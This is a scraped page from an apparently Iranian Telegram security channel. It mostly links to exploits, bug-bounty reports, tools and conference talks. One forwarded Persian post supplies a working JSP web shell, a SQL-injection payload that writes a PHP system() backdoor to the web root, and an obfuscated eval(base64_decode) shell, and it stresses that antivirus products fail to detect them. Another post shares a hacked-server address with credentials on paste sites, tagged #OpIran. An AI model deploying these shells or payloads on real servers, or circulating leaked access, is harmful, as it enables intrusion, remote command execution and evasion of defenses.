HackerOne – Telegram
HackerOne
@HackerOne
11.1K subscribers
644 photos
31 videos
79 files
2.74K links
Community : @Sec0x01
@Bug0x
Download Telegram
About
Blog
Apps
Platform
Join
HackerOne
11.1K subscribers
HackerOne
iOS 10.1.1 Kernel & Root Exploit by Project Zero Team RELEASED !
https://m.reddit.com/r/jailbreak/comments/5iiyo1/discussion_ios_1011_kernel_root_exploit_by/
https://youtu.be/MeqbzfKi7WY
YouTube
Ian Beer's iOS 10.1.1 Exploit Demo and Detection
Last week, Ian Beer, from the Google Project Zero research team, released his local elevation of privileges exploit targeting iOS 10.1.1. We took it upon our...
491 views
HackerOne
Forwarded from Deleted Account
https://www.instagram.com/p/BOMuCWgBzxz/
Instagram
اگه یه سری اطلاعات داشته باشی و بدونی که لو رفته ، دوست داری دست سازمان سیا (اطلاعات امریکا) بیوفته یا وزارت اطلاعات ایران ...؟؟؟
513 views
HackerOne
Forwarded from Israel_zurael_sTz
download.freeleecher.ir:555
user : https://ghostbin.com/paste/krbqh

5 ports http://pastebin.com/kVLxN7HU
@HackRead #Oplslam #Opiran #iran #freeleecher
Pastebin
download.freeleecher.ir:555 | user... | #ICA - Pastebin.com
112 views
HackerOne
https://github.com/tunz/js-vuln-db
GitHub
GitHub - tunz/js-vuln-db: A collection of JavaScript engine CVEs with PoCs
A collection of JavaScript engine CVEs with PoCs. Contribute to tunz/js-vuln-db development by creating an account on GitHub.
321 views
HackerOne
Forwarded from ناویا، ماشین کاوش اپلای
وب‌شل‌ها ابزار مدیریت و Post Exploitation مهاجمین تحت وب است. آن‌ها می‌توانند با وب‌شل‌ بسیار سریعتر و بهینه‌تر به اجزای سرورها دسترسی داشته و عملیات خود را انجام دهند.
همانطور که می‌دانید وب‌شل‌ها تغییر چندانی در ماهیت خود از چند سال پیش نداشته‌اند، اما به مرور سیاست‌های جلوگیری از تشخیص در آن‌ها به‌کار گرفته شده است.

۱. استفاده از فناوری JSP در کنار استفاده از فناوری‌های Web2:
‍‍
<%@ page import="java.util.*,java.io.*"%>

<html>

  <body>

    <form method="GET" name="offsec.ir" action="">

      <input type="text" name="cmd">

      <input type="submit" value="Send">

    </form>

    <pre>

      <%

        if (request.getParameter("cmd") != null)

        {

          out.println("Command: " + request.getParameter("cmd") + "<br>");

          Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));

          OutputStream os = p.getOutputStream();

          InputStream in = p.getInputStream();

          DataInputStream dis = new DataInputStream(in);

          String disr = dis.readLine();

          while ( disr != null )

          {

            out.println(disr);

            disr = dis.readLine();

          }

        }

      %>

    </pre>

  </body>

</html>


که هم‌اکنون نیز مشاهده می‌کنید (goo.gl/PE6ZC0) میزان شناخت این وب‌شل توسط ضدویروس‌ها ۲ از ۵۴ بوده است.


۲. استفاده از توابع خطرناک در میانه‌ی کدها و عملیات روتین تحت وب:

UNION SELECT NULL,"<? system($_REQUEST['cmd']); ?>", NULL INTO OUTFILE "/var/www/offsec.ir/webshell.php" —


که بدیهی است یک دستور SQL به جهت جا انداختن یک پشت‌دری (Backdoor) درون یک فایل می‌باشد. البته برای این مورد مهاجم باید یک آسیب‌پذیری SQL Injection یافت کند.

میزان شناخت این مورد توسط ضدویروس‌ها، صفر از ۵۴ بوده است!

۳. یکی از مزایای مبهم‌سازی (Obfuscation) کدها برای حملات تحت وب، استفاده از الگوریتم‌ها و ترکیبات ناشناخته‌ی آن جهت مقابله با IDS/IPS ها، ضدویروس‌ها، Firewallها و دیگر ابزارهای شناخت وب‌شل‌ است. در این مورد قصد داریم یک الگوریتم ترکیبی را به شما نمایش دهیم تا درک کنید چقدر دورزدن ضدویروس‌ها می‌تواند آسان باشد:

<?php

/*

@offscmag – offsec.ir

Obfuscation provided by FOPO - Free Online PHP Obfuscator

Checksum: e5a931bb23bbcc2dbf286decc8e2b2b72a7d9b0b

*/ $g2a594c0="\x62\x61\163\145\66\64\137\144\145\143\157\144\145";@eval($g2a594c0( "Ly9Oc044UThBMCtXVVJ6NytPQ2VkU0lGeFczNEwrR1NZVlJnZHN5M1pKK01mSXRJUkRYeU1OOGR2RX


این قسمتی از یک وب‌شل مبهم‌سازی‌شده توسط ابزار رایگان و آنلاین FOPO می‌باشد که میزان شناخت آن توسط ضدویرس‌ها صفر از ۵۴ بوده است! (goo.gl/9JznXu)

ممکن است در نگاه اول کمی عجیب بوده باشد اما محتوای شفاف آن به شکل زیر است:

$g2a594c0=”base64_decode”;

@eval($g2a594c0(“…”);


تنها تفاوت آن با دیگر ابزارهای مبهم‌سازی این است که رشته‌ی “base64_decode” را چطور رمزگذاری (Encode)‌ می‌کند.
نمونه‌هایی از آن به این صورت است:

$ueafa759="\x62\141\163\x65\66\64\x5f\x64\x65\143\x6f\x64\145";

$c03a9f9c="\142\141\163\145\x36\64\x5f\x64\x65\x63\157\x64\x65";

$p44aaf5f="\x62\141\163\145\66\64\x5f\x64\145\143\x6f\x64\x65";


توجه می‌کنید که هر کدام از مقادیر یک ترکیب متفاوت از مقادیر Hex و Octal دیگری است! به همین سادگی.
در پست‌های آینده ان‌شاالله با روش‌های شناخت و جلوگیری بهینه و مدرن این سری از عملیات آشنا خواهید شد.
گروه پژوهشی آفسک
@offsecmag
126 views
HackerOne
http://kalilinux.co/2016/11/13/wordpress-461-rce/
Think outside of the box
WordPress
Vulnerability Impact Arbitrary code execution with the following two conditions: An attacker can upload your own configuration language file, or the file containing the language themes, plug-ins folder Website attacker […]
335 views
HackerOne
wfuzz - Web application bruteforcer github.com/xmendez/wfuzz
GitHub
GitHub - xmendez/wfuzz: Web application fuzzer
Web application fuzzer. Contribute to xmendez/wfuzz development by creating an account on GitHub.
316 views
HackerOne
https://hackerone.com/reports/184596
HackerOne
U.S. Dept Of Defense disclosed on HackerOne: Unrestricted File Upload
A Navy system had a file upload tool accessible from the Internet. This would have permitted an attacker to upload malicious files and potentially execute code on the server. Thanks to @hogarth45...
291 views
HackerOne
https://hackerone.com/reports/168538
HackerOne
X / xAI disclosed on HackerOne: Twitter iOS fails to validate...
Twitter on iOS newest two versions (6.62 and 6.62.1) are affected, other versions not tested. Tested independently on two different iPhone 6 with iOS version 9.3.3 and 9.3.5 without Jailbreak. The...
302 views
HackerOne
https://hackerone.com/reports/49652
HackerOne
HackerOne disclosed on HackerOne: Improperly validated fields...
**Note:** I haven't yet investigated the implications of this fully, so this may be more severe than I'm currently aware of. Right now the only exploits I'm aware of allow a team member to attack...
315 views
HackerOne
BARF : Binary Analysis and Reverse engineering Framework
https://github.com/programa-stic/barf-project
GitHub
GitHub - programa-stic/barf-project: BARF : A multiplatform open source Binary Analysis and Reverse engineering Framework
BARF : A multiplatform open source Binary Analysis and Reverse engineering Framework - programa-stic/barf-project
439 views
HackerOne
Critical Flaw in PHPMailer, popular email sending PHP library, leaves Millions of Sites Vulnerable to Remote Exploit
http://thehackernews.com/2016/12/phpmailer-security.html
416 views
HackerOne
https://www.exploit-db.com/exploits/40932/
Exploit Database
WHMCompleteSolution (WHMCS) Addon VMPanel 2.7.4 - SQL Injection
WHMCompleteSolution (WHMCS) Addon VMPanel 2.7.4 - SQL Injection.. webapps exploit for PHP platform
570 views
HackerOne
TR | Kriptografiye Giriş – 1
bit.ly/2htCoUv
288 views
HackerOne
https://media.ccc.de/v/33c3-7949-wheel_of_fortune
ارائه علی عباسی در کنفرانس CCC در رابطه با ضعف امنیتی سیستم‌های تعبیه شده در تولید اعداد تصادفی .
media.ccc.de
Wheel of Fortune
Secure random number generators play a crucial role in the wider security ecosystem. In the absence of a dedicated hardware True Random N...
371 views
HackerOne
https://youtu.be/brYdF-iks0Q
YouTube
Wheel of Fortune (33c3)
https://media.ccc.de/v/33c3-7949-wheel_of_fortune Analyzing Embedded OS Random Number Generators Secure random number generators play a crucial role in the w...
346 views
HackerOne
#zone_h
#iran
250 views
HackerOne
Forwarded from بی‌خوف؛ امنیت در دنیای دیجیتال
اوباما ۳۵ دیپلمات متهم به جاسوسی روسیه را از آمریکا اخراج کرد؛ سفارت روسیه در بریتانیا با جوجه اردک جواب داد!
بیشتر بخوانید:
http://bit.ly/2ikFEjE
— — —
🔐 @Bikhof: امنیت؛ در دنیای دیجیتال
37 views
HackerOne
http://4xmen.ir/%DA%86%DA%AF%D9%88%D9%86%DA%AF%DB%8C-%DA%A9%D8%A7%D8%B1-%D9%88-%D8%A7%D9%85%D9%86%DB%8C%D8%AA-%D8%AF%D8%B1-%D8%B4%D8%A8%DA%A9%D9%87-tor-%D9%88-%D9%85%D8%B3%DB%8C%D8%B1%DB%8C%D8%A7%D8%A8%DB%8C-%D9%BE/
248 views
HackerOne
283 views
HackerOne
https://www.youtube.com/watch?v=cEiik4mE-pM
YouTube
Mail.Ru - Send Edited Message Vulnerability
Hello , I found a vulnerability in e.mail.ru , with this can send edited message .
Ehsan Hosseini(Ehsan Cod3r)
Vulnerability Type: Design Issue, Privilege Escalation
https://cxsecurity.com/issue/WLB-2017010001
259 views